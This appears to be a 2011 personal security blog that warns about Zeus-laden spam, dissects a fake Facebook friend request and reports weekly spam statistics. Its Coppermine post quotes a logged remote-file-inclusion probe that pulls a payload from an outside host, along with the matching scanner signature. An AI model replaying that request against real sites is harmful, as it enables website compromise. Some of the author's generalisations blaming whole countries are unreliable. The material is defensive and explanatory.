Wiz's Computer and Website Security Blog

It was only a couple of days ago (8/26/2011) that I published a blog article warning people about the threats contained in fraudulent emails claiming that an ACH transfer had been canceled and that the recipient needed to read the report in the attached file.

Beginning at 3 AM, EST, I received four consecutive email scams in 15 minutes, with the subject: "FDIC notification," with the forged sender (the actual "sender" is an infected PC in a spam botnet): "[email protected]," and the following body text:

Dear customer,
Your account ACH and WIRE transaction have been temporarily suspended for
security reasons due to the expiration of your security version. To download and install the newest installations read the document(pdf) attached below.
As soon as it is setup, you transaction abilities will be fully restored.

Best Regards, Online Security departament, Federal Deposit Insurance Corporation.

Like the UPS and ACH scams that preceded it, this scam contains a variant of the Zeus or Zbot Trojan Horse. Its purpose is to install hidden malware that watches for you to visit targeted financial institutions, or your website's control panel, or PayPal, etc. Once you do it intercepts your login credentials and forwards them to the criminals running these scams. Your bank accounts, PayPal accounts and God knows what else may be emptied before you know what hit you!

If you use MailWasher Pro to screen your incoming email for spam and threats in attachments, my custom ZIP Attachment filter will alert you to these and similar threats. Never open the attachments in these scams! Delete the email on sight! Opening these messages will launch the installer for the Zbot. Your PC will not only have the Zeus keylogger installed, but will be made a part of the Botnet from which you received your recruitment message.

Posted by Wiz at 3:01 AM | Permalink

back to top ^

After a month of lower email spam volumes, this past week I saw an 11% increase over the previous week, which itself had a 7% increase from the week before. That makes about 18% more spam than two full weeks ago. Most troubling was the fact that a lot of this unwanted email contained malware infected attachments.

The last spam run containing infected attachments was a fake ACH Payment Canceled campaign. It started immediately after a run of fake Uniform Ticket email scams, and both contained the Zeus, a.k.a. Zbot Trojan. This is a hidden keylogger that watches for victims to login to particular banks, Trust companies, PayPal, website control panels, or trading companies. It collects the login credentials and sends them in a data stream to the criminals renting the use of the botnet responsible for sending the spam run. They then steal your money, or hack your websites.

There was also a continuation of the previous week's fake Facebook Friend Requests, containing links leading to direct downloads of Trojans. I wrote about this scam earlier this week, in this article: Beware Fake Facebook Friend Requests, Leading to Malware. To date, all of the requests I have received have contained Arabic names in the subject, but, that may change next time the miscreants behind this scam send another spam blast.

Since I noticed last Sunday that the volume of spam was staying high, I returned to using MailWasher Pro 6.4 to block spam and collect statistics that are easy to view and use in my reports. The current new version, 2011, is fully capable of blocking as much of the spam as the older version, but lacks a statistics page as of this writing.

In case you were wondering, one you can still purchase a licensed copy of MailWasher Pro 6.4, from the Firetrust website. Or, if you don't care about the Statistics readout, but want faster processing, try the new version (same link).

Here are the basic stats for the last week's spam:

Total email received: 501
Amount classified as spam: 219
Percentage of spam: 43%
Number matched by my custom filters: 208
Number caught by my Blacklist: 5
Number identified by DNS Blacklusts: 4
Reported to SpamCop: 29

Individual categories of spam follow...

Percentages of spam by category of filter.

Counterfeit Watches: 15.67%
Misc filters: 13.36%
Male Enhancement: 11.52%
Cialis (counterfeit): 11.52%
Weight Loss scams (HCG): 9.22%
Courier Scams (UPS): 9.22%
Pharmaceutical Spam: 8.76%
Software Spam: 5.99%
Zip Attachments (Zeus Trojan): 4.15%
.RU, .RO, or .UA links: 3.23%
Fake Facebook Fried Requests (Arabic names): 3.23%
My Custom Blacklist: 2.30%
DNS Blacklisted Email Servers: 1.84%

Updates to my Custom MailWasher Filters:

E-Card Scam,
Known Spam Domains ,
.RU or .UA Domain Link (2x),
Software Spam.
New filter: Fake Facebook Friend Request.
Split Software Spam into 2 new filters: Software Spam [S] and Software Spam [B] and updated both.

New Blacklist entries:
[email protected] AND [email protected]

Note: I write and publish custom spam filters for both the old and new versions of MailWasher Pro.

I use and recommend MailWasher Pro (2011) to screen my incoming POP3 email for spam, scams and virus threats, before downloading anything to my Windows Live Mail email client.

Posted by Wiz at 4:15 PM | Permalink

back to top ^

For the last 2 days I have seen a slowly building spam campaign featuring a previously used trick Subject: "ACH Payment (7 numbers) Canceled." The message body is short and sweet, along the line of the following:

The ACH transaction,
recently initiated from your checking account (by you or any other person),
was canceled by the other financial institution.

Rejected transaction

Reason for rejection: See details in the attachment

The From line is usually: "account manager" ([email protected], or [email protected]). You will be getting these sent to every one of your email accounts, should you have multiple accounts, like I do. Domains with email are especially hard hit in today's spam campaigns.

The actual "sender" is a PC in a spam botnet, operating under commands from the Bot Master running this show. All reply-to and From information is forged.

The payload in the current crop of malware in attachments is the "Zeus" aka: "ZBot" keylogger Trojan. The installer may also make the victim's computer a member of the same botnet from which their scam message was sent. This perpetuates and increases the size of the botnet and steals money from victims as they log into banks and payment portals targeted by this Zeus variant.

My advice to recipients of one of these, or future variations of these scams, is to phone you bank, or financial institution and ask them to check your account for problem transactions. Note, there have been some spam campaigns that include a fake contact phone number that actually leads to people hired by the criminals running particular campaigns. So, your safest bet is to look-up the number for your bank, or flip over your debit or credit card and call the number listed on it.

Interestingly, these malware in attachments scams began on August 25, just after the previous run of UPS malware scams ended. No doubt, the same botnet is sending both, rotating subjects and body text and attachment names, via templates downloaded to the zombie computers in the botnet.

I delete all such malware laden spam messages, which are automatically flagged by one or more custom spam filters I write, by my email screening program: MailWasher Pro - (learn about MailWasher Pro here). My advice to you is to delete them on sight, without opening them. Phone your bank if you are worried.

If your bank sends you email messages and alerts about problems, the message will include your proper name. None of these scams include any personal names as salutations. That is red flag number one in all such malware and phishing scams.

Stay alert to scams in spams. Do not open any email attachments out of curiosity. Only open attachments you are expecting, from senders you are expecting them from, and then, only if you have modern, fully updated anti-virus/anti-malware protection running on your computers.

Posted by Wiz at 10:47 AM | Permalink

back to top ^

Tonight I received what appeared to be a Facebook Friend Request, but it was addressed to an account not associated with Facebook. It was also suspiciously marked with gray icons in MailWasher Pro. This indicates that the anti-spam program wasn't sure if it was good or bad. That set off my alarm bells, because I have a custom filter that identifies all legitimate messages from Facebook as Good.

Luckily for me, I am a spam fighter and suspicion is my modus operandi. Had I been a casual computer user I may have curiously clicked on the link in this email and had my computer infected with a fake Flash Player update, plus an exploit attack kit, within seconds! Then I would have been Phished with a fake Facebook login page! Here is what I saw and what the source code revealed about the email message.

First, the headers:

Delivery-date: Sun, 21 Aug 2011 21:36:18 -0600
Received: from [123.236.135.113] (helo=ZDIHFSM)

my own server details removed

Received: from mta900.em.linkedin.com (mta900.em.linkedin.com [63.211.90.176])
by mail.rctengineering.com (8.13.8/8.13.8) with ESMTP id 2714Y3V654427
for ; Mon, 22 Aug 2011 09:05:39 +0530
Date: Mon, 22 Aug 2011 09:05:39 +0530

Subject: Zaahid Ababneh wants to be friends on Facebook.
From: Facebook <notification+gugsche@facebookmail.com>

Look at the bold portions of the above headers The first bold line contains the date when this email was delivered to me, by my email server, which is in Utah:
Sun, 21 Aug 2011 21:36:18 -0600

Directly underneath the arrival date is the last Received From line, indicating that the email was delivered to me from the IP address 123.236.135.113. If this email really came from Facebook, the IP address would resolve to one with facebook.com in a "Whois" look-up, and in a reverse IP look-up. However, running a Whois check on this IP address revealed that rather than belong to Facebook, it is registered to Reliance Communications, in Mumbai, India!

Moving down to the next Received line, it says that the email was relayed through LinkedIn. Now, why would Facebook need to use LinkedIn servers? They absolutely would NOT. Also, note that the email was handed to the LinkedIn mail server by the rctengineering.com domain, not Facebook. That domain belongs to a Bell South customer!

Now, look at the date when the email was relayed through the alleged LinkedIn server: Mon, 22 Aug 2011 09:05:39 +0530. That date is almost 12 hours in the future from when my email server in the USA received the message. I ran a look-up of timezones and found that +5:30 belongs to India. That coincides with the IP address of the Received From line at the beginning (which is the final email hand-off). That proves that the message did indeed come from India and was not associated with any Facebook email servers in the USA, or anywhere else.

More...

Another giveaway is the name in the email address of the sender of the notification. It is almost always somehow related to the actual name of the person wishing to become friends with a Facebook user. But, this time, the name in the email address prefis was nothing like the Arabic name in the Subject line. Rather, it was "gugsche"

With so much wrong in the headers I took a look at the source code in the message body. After scrolling down through numerous lines of code and images, I finally arrived at the payload link, near the bottom. The anchor text (text inside the opening and closing link codes) said "Confirm Friend Request" - but, the actual destination of the hidden hyperlink was not to anywhere on Facebook.com. Instead, the link pointed to "session74815472744961.pmstdl.com/confirm/req/" (hovering over the link reveals this)

When I investigated this link, using a safe, non-exploitable browsing tool and a Whois Look-up, I found that the domain belongs to a Russian person, going as Aleksei O Zhukov, in Moskovskaya Oblast, Russia. Every time I reloaded the link form the email, I ended up on a different IP address, hosting the exact same fake Facebook Login Phishing page. Rotating IP addresses is a common trick used by Phishing scammers and drug spammers, to protect against total takedown of their criminal operation.

For the tekkies among you, the landing pages are all running Russian Nginx web servers.

There is a hidden iframe on the landing page, leading to exploit attacks on your browser. Furthermore, there is a fake Flash movie area, with a missing plugin notice and a link telling you to update your Flash Player. That update, titled "updateflash.exe" - leads to a malware infection you will regret. It is hosted on that very website, although it claims you will be updating at adobe.com. NOT!

Anybody who is tricked into clicking on the link in these fake Facebook Friend Requests is treated to three criminal exploits.

1. your Facebook credentials are stolen and used by spammers and malware distributors


2. Your browser is assaulted with a crimeware exploit pack


3. You are tricked into installing fake/rogue anti-virus, or similar worthless software, which will claim that your PC is infected and will demand payment to clean the infections

My advice to anybody receiving a Facebook Friend Request, is to find out how you can display the complete headers and look over the information contained in them for inconsistencies. If it says Facebook, but the Received From mail servers are not from facebook.com and a Whois look-up of the IP of the sender is not assigned to facebook.com, it is a scam. Hover, but don't click over any links to accept the request and read the actual URL destination in your email client's, or browser's status bar, on the bottom. If the first section after http:// and ending with the first forward slash (/) is not facebook.com, it is a hostile link. Delete the email immediately!

Stay safe my friends (Facebook and other)!

NB: I used MailWasher Pro to screen this and all incoming email. It can show the entire source code with the click of a button.

Posted by Wiz at 2:03 AM | Permalink

back to top ^

I have detected a huge exploit probe attack against the Maze theme interface for Coppermine web photo galleries, targeting my blog. Hundreds of probes were launched tonight, August 21 through 22, 2011, from the IP address 64.31.60.72 - a static IP which belongs to Limestone Networks, in Dallas, Texas.

Here is a tiny excerpt of the attack, meant to exploit a vulnerability in the Coppermine-Maze Theme, to include hostile files and codes into a blog, or photo gallery, via a vulnerable and unpatched Coppermine theme:

64.31.60.72 - - [21/Aug/2011:14:55:18 -0600] "GET /blogs/2009/11//modules/coppermine/themes/maze/theme.php?THEME_DIR=http://184.22.121.212:60000/byroe.jpg?? HTTP/1.1" 405 766 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

You will note that the URL where the exploit code is hosted is shown to be http://184.22.121.212 - which resolves to 184-22-121-212.static.hostnoc.net. The exploit is defined in the RFI (Remote File Inclusion) Vulnerabilities Scanner, at the OSSEC Wiki, as: "$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";" That exploit code has been in the wild since April 2004, according to Security Tracker.

If you are running the Coppermine Photo Gallery software on a website under your control, check your access logs to see if you have been hit by this attack. Then, look at the server response codes and see if any are code 200. If so, you are probably hacked. I feed them a Server 405: Method Not Allowed.Next, log into your Coppermine admin panel and go over every setting to see what, if anything has been changed without your knowledge. Visit your gallery, using Firefox, with the NoScript add-on installed and active. View the Source code of your Gallery web pages and press Control + A to highlight all text and codes. Look for 1x1 px iframes with links to outside websites and other bad codes, like JavaScript or meta refresh redirects.

Remove any hostile changes, then save the cleaned pages. Check your server permissions to make sure that they are not writable by the World; just the Owner (You). 644 is safest (Read-Write for Owner - Read-Read for Group and World) permission, for html, script, and php files. Seek updates for Coppermine and for any themes you are using with it. Notify your web host of the exploit and have them run a vulnerability scan on your remaining pages and clean up anything you overlooked.

If you use an FTP client to upload files to your website, you can establish permissions on each remote file. Check the Help file that is part of the FTP program. If you use WS_FTP, on a Linux/Unix host, there is a right-click option labeled Properties, which opens a box that sets the numeric or actions permissions for any selected file, or group of selected files. Clicking OK after changing permissions makes the change take. If you see PHP or HTML files with 664, or 666 permissions, change them to 644, unless you know that they are safe to be left writable by the World (aka: Everyone) and Group.

If you use a web interface to manage files on your server, check the instructions for how to set or change file permissions on the server.

According to the Coppermine home page news, the latest stable version containing security patches is cpg1.5.12 (Security release - upgrade mandatory!), dated 02 January 2011. There is a very recent maintenance release: cpg1.5.14, dated August 1, 2011. I advise you to upgrade to the latest version on the Coppermine home page, if you have any older version number. Get on their mailing list to be notified about security updates, as they are issued.

Stay safe and keep your website safe for your visitors. As a Webmaster you must practice safe Hex! Do not assume that you web host will update software you have chosen to install. They won't do anything except shut down your account when it gets reported for infecting innocent visitors. If you don't know how to update web software, call your web host, ask for technical support and request assistance updating your galleries, blogs, themes, etc. They may charge you a fee, or not. You install it, you update it! It gets hacked, you fix it!

Posted by Wiz at 12:38 AM | Permalink

back to top ^

This week I am changing the nature of my spam report. In all previous articles, I used the "Statistics" from MailWasher Pro, version 6.x. However, this past week I switched to the latest version of MailWasher Pro: 2011. At this time it lacks a "Statistics" readout, so I have compiled my own stats. They reveal some interesting facts about this week's email spam.

The first thing I learned when going over the spam categories, in the MailWasher Pro Recycle Bin, was that the overall volume of spam is way up from last week. For the week ending on August 14, 2011, the total amount of spam received was 128. This week, ending August 21, the total was 175, as of the time I wrote this. Without an exact stat report, I am guesstimating that this represents about 33% of my total email this past week. That would make it about 5% more than last week.

Of these 175 spam emails, 169 were identified by my custom spam filters. Six more were classified as spam manually and inputted into the learning filter, for future detections. The majority of spam was 44 messages touting fake Cialis. This was followed by 24 for counterfeit watches. Next in line was 15 emails promoting male enhancement herbs, then 13 each for weight loss drugs (illegal to import, or use without a face to face prescription; HGC drops) and finally, malware infected botnet Trojans inside zipfiles claiming to be invoices, delivery notices, etc.

Other lesser categories of spam included: Fake Diplomas, Lotteries, African senders, 419 scams, foreign language spam, miscellaneous pharmaceuticals, pirated software, Viagra, known spam domains and subjects, ISO encoded subjects, and my blocked countries filters.

The last major category, the infected zipfiles, are part of a huge attack that has been ongoing for three weeks in a row. Bot Herders, having lost control of millions of zombies, when Microsoft, FireEye, the DOJ and other security research companies decapitated the Bredolab (in October 2010), Coreflood, Rustock, Waledac and other spam-spewing botnets this year, are hard at work rebuilding their armies of robotic malware slaves. Their most successful weapon seems to continue to be exploiting the weakest link in the chain of infection: Human Curiosity. Send out a gazillion spam messages about a pending, or failed delivery. or an alleged speeding ticket, or failure to process an IRS refund or tax form, and thousands of curious, gullible people will open the attached zipfiles to see what the fuss is all about. Poof: they are botted!

More...

This week I made 7 update and/or additions to my custom filters:
Courier Scam #7 (UPS infected attachments),
HTML Spam Tricks,
.Info Images and Links (2 times),
Known Spam Subjects #4,
Software Spam,
Viagra Spam [B]

Don't let your PC become a zombie in a spam, or malware/phishing hosting, or DDoS attack botnet. Delete scam and spam emails on sight, and do not open any attachments unless you are specifically expecting them from the sender of that message - and then, only if you have state of the art, up to date anti virus protection watching as you open email messages.

I use and recommend MailWasher Pro (2011) to screen my incoming POP3 email for spam, scams and virus threats, before downloading anything to my Windows Live Mail email client.

Posted by Wiz at 3:36 PM | Permalink

back to top ^

This week I saw an increase in the amount of spam hitting my inbox. The percentage of spam was up 7% from the previous week. Actually, the greatest volume of spam occurred from Thursday through today. It was on August 11 that a giant spam run began with malware infected attachments, in scam emails claiming to be from the IRS and UPS.

Due to the huge influx of malware laden attachments in fake IRS ("could not process your return/refund") and UPS ("your package delivered ... print out invoice") messages, the top category last week was Zip file attachments, which led by more than double the amount of the runner up: male enhancement. While the enhancement and enlargement spam is a nuisance, the ones pretending to come from the IRS and UPS were downright dangerous. They contain botnet and key logging Trojans in zip files.

This past 7 days, spam for various types of unsolicited commercial email (UCE) amounted to 28% of my incoming email. This is according to MailWasher Pro, which I use to screen incoming email before downloading it to my desktop email program (Windows Live Mail). I report any spam messages that make it through my auto-delete filters to SpamCop.

Here are some statistics regarding the spam received and categorized, from Aug 7 - 14, 2011. These classifications are based upon my own custom MailWasher spam filters. Most of this spam is automatically deleted by MailWasher Pro and my custom filters. The statistics are obtained from the program's logs.

Statistics Overview

Percentage classified as spam: 28%; +7% from last week
Number of messages classified as spam: 128
Number classified by my custom spam filters: 122
Number and percentage of spam according to my custom blacklist: 3
Number classified as spam by the Bayesian Learning filter: 0
Number classified as spam according to DNS Blocklists (SpamCop, Spamhaus, etc): 1
Number of spam messages seen, reported to SpamCop & manually deleted: 52

The actual percentages of spam by category follow below.

The order of spam categories, according to the highest percentages, is as follows:

Zip, Rar, Gz Attachments (malware!): 37.30%
Male Enhancement scams: 15.87%
Fake Cialis:9.52%
Weight Loss Scams (e.g. HCG): 7.14%
Known Spam Domains: 6.35%
URL Shortener spam link: 3.17%
Hidden ISO Subject: 2.38%
Counterfeit Watches: 2.38% (way down from last week!)
Pharmaceuticals spam: 2.38%
My Custom Blacklist: 2.38%
Base64 spam encoded message: 1.59%
DNS Blacklists (SpamCop, Spamhaus, etc): 0.79%
Other Filters (with small individual percentages): 8.73%

This week I made 1 update and/or additions to my custom filters:
Pump and Dump Scam

I made 1 addition to my custom Blacklist this week:
+@best*offers.com

There was one false positives last week, resulting in the removal of just one letter, from the Male Enhancement filter. All other filters behaved as intended, or as updated. My filters are published in both the old and new MailWasher Pro formats. One type is for the latest 2011 series, in xml format, and two are for the previous series 6.x. One of those filters is set for manual deletions and the other for automatic deletions. You can read all about MailWasher Pro and the filters I write for it, on my MailWasher Pro Custom Filters page.

If you are having trouble caused by excess volumes of spam email, and are not using an effective filter, why not try out MailWasher Pro? Not only does it detect and block spam, but can also protect your PC from downloading harmful viruses, or other known threats.

Posted by Wiz at 4:39 PM | Permalink

back to top ^

This week finally gave me some measurable decline in the amount of spam hitting my inbox. The percentage of spam is down 6% from the previous week and the actual volume is down by even more. This is a reflection of the decline in revenues from spamvertised products and in the recent closure of several spam affiliate payment processors.

As for the top categories of spam, Male Enhancement took first place, followed by counterfeit watches, then fake Viagra, Cialis, weight loss drops, and other scams. There are still a considerable number of bogus diploma spams coming in, so some people must be stupid enough to purchase these worthless documents.

I see a repetitive pattern in certain types of spam, mostly for fake diplomas. The subjects are "RE: Hello" - "RE:Re:Hello" - "RE: RE:News" and similar. My Diploma and other existing filters pick them off based on the body text, with zero mistakes.

This past 7 days, spam for various types of unsolicited commercial email (UCE) amounted to 21% of my incoming email. This is according to MailWasher Pro, which I use to screen incoming email before downloading it to my desktop email program (Windows Live Mail). I report any spam messages that make it through my auto-delete filters to SpamCop.

Here are some statistics regarding the spam received and categorized, from Aug 1 - 7, 2011. These classifications are based upon my own custom MailWasher spam filters. Most of this spam is automatically deleted by MailWasher Pro and my custom filters. The statistics are obtained from the program's logs.

Statistics Overview

Percentage classified as spam: 21%; -6% from last week
Number of messages classified as spam: 85
Number classified by my custom spam filters: 75
Number and percentage of spam according to my custom blacklist: 3
Number classified as spam by the Bayesian Learning filter: 0
Number classified as spam according to DNS Blocklists (SpamCop, Spamhaus, etc): 1
Number of spam messages seen, reported to SpamCop & manually deleted: 13

The actual percentages of spam by category follow below.

The order of spam categories, according to the highest percentages, is as follows:

Male Enhancement scams: 26.58%
Counterfeit Watches: 11.39% (over double from last week!)
Fake Viagra: 8.86% (down 60%)
Fake Cialis: 7.59%
Weight Loss Scams (e.g. HCG): 7.59%
Known Spam Domains: 7.59%
Diploma Spam: 6.33% (down 1/3)
.RU (Russian) Domain Link: 5.06%
My Custom Blacklist: 3.80%
Lottery Scam: 2.53%
Non-English Language spam (apparently, Spanish and French): 2.53%
DNS Blacklists (SpamCop, Spamhaus, etc): 1.27%
Other Filters (with small individual percentages): 8.86%

This week I made 6 updates and/or additions to my custom filters:

Cialis filter re-enabled and edited,
Drugstore with spaced words,
Known Spam Domains,
Male Enhancement [S],
Split ".BR, .CN, .RU, .UA" filter into these 2 new filters:
    .BR & .CN Domain Link,
    and, .RU & .UA Domain Link

I made 1 addition to my custom Blacklist this week:
[email protected] (pump and dump stock scam)

There was one false positives last week, resulting in the removal of just one letter, from the Male Enhancement filter. All other filters behaved as intended, or as updated. My filters are published in both the old and new MailWasher Pro formats. One type is for the latest 2011 series, in xml format, and two are for the previous series 6.x. One of those filters is set for manual deletions and the other for automatic deletions. You can read all about MailWasher Pro and the filters I write for it, on my MailWasher Pro Custom Filters page.

If you are having trouble caused by excess volumes of spam email, and are not using an effective filter, why not try out MailWasher Pro? Not only does it detect and block spam, but can also protect your PC from downloading harmful viruses, or other known threats.

Posted by Wiz at 1:28 PM | Permalink

back to top ^

If you a website owner, or Webmaster and you have installed WordPress blog software with image gallery themes on your websites, you may have a big problem, effective 8/1/2011. These programs are complicated software and as such, are subject to flaws caused by programming oversights. Exploitable scripting flaws have been discovered in a popular plug-in for themes: TimThumb. Those flaws are currently being used to inject malicious scripts and codes into millions of web pages. You need to see if your website is vulnerable to these exploits in the wild.

The details

This particular problem doesn't lie inside the WordPress software itself, but in a third party "plug-in" used by image themes that allow resizing of uploaded images. Those images may be uploaded by the owner of the blog, or by visitors from the Internet. Therein lies the danger.

First of all, you must be running the most current version of WordPress, which at this writing is v 3.2.1, preferably, with only themes approved and delivered through the WordPress website. This will protect the WordPress software itself, until a new vulnerability is discovered and published by hacker groups. Always get on the WordPress mailing list so you are notified when new versions are released. I recommend you bookmark and read this page often: http://wordpress.org/news/category/security/

You still need to check any theme directories (aka Folders) for the presence of the currently exploited file. If you are using an older version of WordPress, you had better upgrade first, at http://wordpress.org/.

The file currently being exploited by remote scanning scripts is named TimThumb.php. This file is used to resize images that are allowed to be uploaded to photo galleries. TimThumb is "inherently insecure" because it writes files into a temporary cache directory when it fetches an image and resizes it. But that directory, which is a sub-directory of your main WordPress directory, is accessible to people visiting the website. An attacker can compromise the site by figuring out how to get TimThumb to grab a malicious PHP file and put it in the WordPress directory. The code will be executed if an attacker then accesses the file using a Web browser.

Okay already. What can the average Joe or Jill do to protect his/her website? First of all, you need to scan you WordPress blog to see if it is already compromised with injected scripts. If so, change your admin password for WordPress, then hunt down all instances of TimThumb.php and if the script version on your server is older than version 2.0, you should immediately either disable those themes, or edit the TimThumb.php files and change the "$allowedSites array" to empty (the default file has an array with 3 to 7 popular websites allowed to upload file to it). This disallows any external site or visitor from using this plug-in to resize images (or exploit your blog by spoofing an approved website). However, you will still be able to resize images you yourself upload.

It has been suggested that renaming all instances of the file named timthumb.php to another, not-easily-guessed prefix, then changing that name in all of the other PHP files that call upon it, will prevent automated file vulnerability scanners from knowing you are using that exploitable plug-in. It hides it, but doesn't fix the problem. Only a new, secure version of the TimThumb file will plug to vulnerabilities being exploited right now.

Read this blog for background information, including details about determining if and how many instances of TimThumb exist on your website and whether or not it has been compromised already. But, do so using Firefox, with the NoScript Add-on enabled, for your own safety. Then go to the Tim Thumb Project page on Google Code pages and download the latest patched version (the link next to "Grab the code from here"). If you click on the "Updates" link you will see a lot of activity right now, as the author and his team hash out the security issues they are discovering in this program. It may be a good idea to disable all existing image resize scripts for your blog, if they use TimThumb, or Thumb.php, until the dust settles.

Note, that the TimThumb team is frantically testing and rewriting the script, up to the moment before I published this article. See the latest build here.

I have learned about another tactic that will at least protect the folder which TimThumb is currently (has been) using to store its temporary cache files. This is the folder into which exploit scripts are currently being uploaded from evil sources. The fix involves both renaming all instances and references to the actual file (timthumb.php) and creating a .htaccess file and placing it into that specific directory, on your website's server.

.htaccess directives to restrict execution of temporary scripts in the cache directory:

RewriteEngine On
Order Deny,Allow
Deny From All

Options -ExecCGI
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi


Sucuri WordPress Check
Securi has released a special PHP script that will scan your WordPress installation to find any and all instances of the TimThumb.php script. You can use the results to either rename the files, or modify them to remove the allowed domains array. Follow the instructions on the aforementioned page to rename, upload and use their script.

This is a big problem that will have a lot of people pulling out their hair, until the dust settles on this case. I want you all to be aware that if you, as a website owner, or acting Webmaster, have installed WordPress, and/or installed an insecure theme, or plug-in for it, you are responsible for updating and fixing it. Your web host is not going to update or secure these programs for you. Sorry, but that is a fact. If you install it, you are responsible for it. If you fail to fix an exploit that is happening on your website, you may find your service terminated until you do fix it. You can bet they won't refund any money you might think you have coming from early termination. Allowing your website to harm other websites, or visitors to your website, is a violation of the standard web hosting terms of service, used by virtually every web host in good standing.

Posted by Wiz at 11:24 PM | Permalink

back to top ^

Since June 22, 2011, I have written 6 articles highlighting Romania as a source of spam attacks and hosting of spamvertised domains. This is my 7th article in 6 weeks, exposing badness coming from Romania, targeting North Americans.

Tonight, while minding my own business, I received an email from an outfit called OTC Pundit (dot com). The subject was: "Food is the New Oil" and the body had little text, but did have a link to an image file.The link was instantly suspicious to me, because it was a numeric link, rather than a named domain. Knowing that this was spam, I exposed the source code in MailWasher Pro. The HTML content revealed that this spam was supposed to look like a news letter of sorts.

The Received From line showed that the email came from the IP address: 89.238.231.135. It contained a link to a file and that link also contained the same IP address. I traced the link with my diagnostic tools and it turns out that 89.238.231.135 belongs to a Romanian web host: EUROWEB Romania, whose entire CIDR is 89.238.192.0/18. That CIDR is already on my Russian Blocklist. I then went back to the source code of the spam message and copied the link, which was to a .jpg image file. I looked over the source code of that link, using WannaBrowser and found that no exploits were attached to it. So, I dropped the URL into my Firefox browser, using the NoScript Add-on for safety.

The image turned out to be a whole page ad for an upcoming pump and dump stock scam. It uses the words Food Is The Next Oil and speaks about food shortages and how investors can profit from other people's misfortune and famines. This is truely a slimeball spam campaign!

The IP address I listed is the IP of a website registered in Romania: otcpundit dot com. It uses rohost.com name servers, as well as those of a marketing company that is on the same Romanian server. The domain was registered with on Feb 2, 2011.

I have taken the following steps to protect my friends from falling for any scams coming from that company: The domain OTC Pundit has been added to the Known Spam Domains filters for MailWasher Pro and the CIDR 89.238.192.0/18 can be added to your email server firewall, if you have root access to administer Linux firewall rules. If you are on shared web hosting you can see if you are able to create a rule to re-route email containing "otcpundit.com" in the entire header, to NULL. If you are not receiving email via your own domain, but through a third party email system, via your browser, you are at their mercy to filter email for you. If you get your email via a POP3 desktop program, like Windows Live Mail, you can use MailWasher Pro, with my custom filters, to filter out spam before it gets downloaded to your email client.

Bottom line: Delete all email messages coming from any variation of OCT Pundit, or Emp-Marketing, or anything with words similar to Food is the Next Oil in the subject or body text. These are pump and dump penny stock scams in the making. Also, 99.99999999% of email that contains a numeric IP address, rather than a domain name and extension, is a link to fraud, or malware. An example of such a URL is: http://123.456.789.0/otherwords-or-characters. Delete all numeric IP link emails on sight. I have a filter for MailWasher Pro that detects numeric IPs in links.

In this case, of image spam, the link ended with .jpg; an image type. However, one cannot assume that the server at the other end will actually deliver an image. It could have been configured to serve an executable exploit instead of an image. Learn how to walk safely through mine fields before you play in them. Browse using Firefox, with the NoScript Add-on enabled. Use WannaBrowser or another text only browser to look at the source code of web pages, before attempting to load those pages, or image files. WannaBrowser will reveal the IP address of any website it can display in the Source field. You can copy that IP address and paste it into the IP Whois field in Domain Tools, or one of my favorites, CQCounter, or any other Whois Look-up site. This reveals where it it hosted, when it was registered, and who is the official domain Registrar.

In the 15th Century, the Romanians gave us the legend of Count Dracula, a.k.a: Vlad Dracula. He sucked the life blood out of his unfortunate victims. Modern day Draculas suck the life savings out of their online victims, by means of spam and scams for useless products and offerings, scripted browser exploits and money laundering schemes.

Stay thirsty my friend! But, avoid the modern day Count Draculas; the money sucking vampires.

Posted by Wiz at 9:33 PM | Permalink

back to top ^

On July 27, 2011, I published a blog article about blog spam scripts running on Ubiquity Servers. For several days those POST attempts from Ubiquity IP space disappeared. They returned today, leading me to a most interesting discovery about the source.

Let me show you how I find information about access log spam attempts and deal with them.

In today's first blog spam attempt, an unknown visitor, with the IP address 108.62.150.52, attempted to POST a trackback comment to my Movable Type blog. If the POST was made by a real person, and if that person understood and read the English language, he or she would have read the bold notice that my blog does not accept either comments or trackbacks.

Of course, if the POST was made by a script, it would neither see that notice, nor care about it. Similarly, if the POST was being attempted by somebody in a very foreign country, in say Romania, they would not understand the text in notices I post on every page, regarding no trackbacks allowed. And from where did this POST originate? Romania!

Here then, without any ado, is the chain of evidence linking a blog spam attempt to Romania, from whence a huge amount of spam and online exploits have been traced.

108.62.150.52 - - [01/Aug/2011:12:15:40 -0600] "POST /cgi-bin/mt/mt-tb.cgi/18/trackback HTTP/1.0" 403 537 "" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"

Reverse IP: 108.62.150.52.rdns.ubiquityservers.com
network:Network-Name: Secondary Assignment - Ticket ID JCE-507-49771
network:IP-Network: 108.62.150.0/24
network:IP-Network-Block: 108.62.150.0 - 108.62.150.255
network:Org-Name: Boboc, Alexandru
network:Street-Address: Calea Victoriei 91-93
network:City: Bucharest
network:State: RO
network:Postal-Code: 10012
network:Country-Code: RO
network: Tech-Contact:MAINT-26532.108.62.150.0/24
contact:Abuse-Name: Nobis Network Abuse Team
contact:Abuse-Email: [email protected]

First of all, the blog article they attempted to spam (#18) is dated April 28, 2006. It now August 1, 2011: five and a quarter years from when that article was posted by me (and never updated). Since then I have posted hundreds of newer articles. Only a spammer tries to post comments and trackbacks in such out-of-date articles. It is one way they use to sneak spam links into blogs, hoping that the person who started that blog won't notice. This time, the spammer is using a server assigned to one Alexandru Boboc, who runs a web hosting business in Romania. They have 255 IP addresses assigned to this CIDR (Classless Inter Domain Routing; a range of consecutive IP addresses) and I have added all of them to my Russian Blocklist, thusly:

<Files *>
order deny,allow
deny from 108.62.150.0/24
</Files *>

If you have websites hosted on Apache web servers, with shared hosting, you can block tons of badness from accessing your pages and scripts, by adding my Russian Blocklist to your .htaccess file. If you have root privileges to a Linux based web server, you can import my iptables Russian Blocklist into your Linux Firewall. People in this category would lease VPS, or dedicated servers, or would be server administrators.

How did I find all of this out? First of all, I read my raw access logs for my primary website. Using the Search function in my browser (Ctrl + F), I look for any entries beginning with this: "POST . Then, if the POST was made to my blog, and not my official contact form, by anybody other than me (I know my home IP address), I immediately trace the IP address by means of a Whois Look-up. I use two websites to do these look-ups: http://cqcounter.com/whois/ - and - http://www.domaintools.com. Both are free, but supported by either advertisements or memberships. No problem: my websites are also supported by advertising, or donations from grateful users.

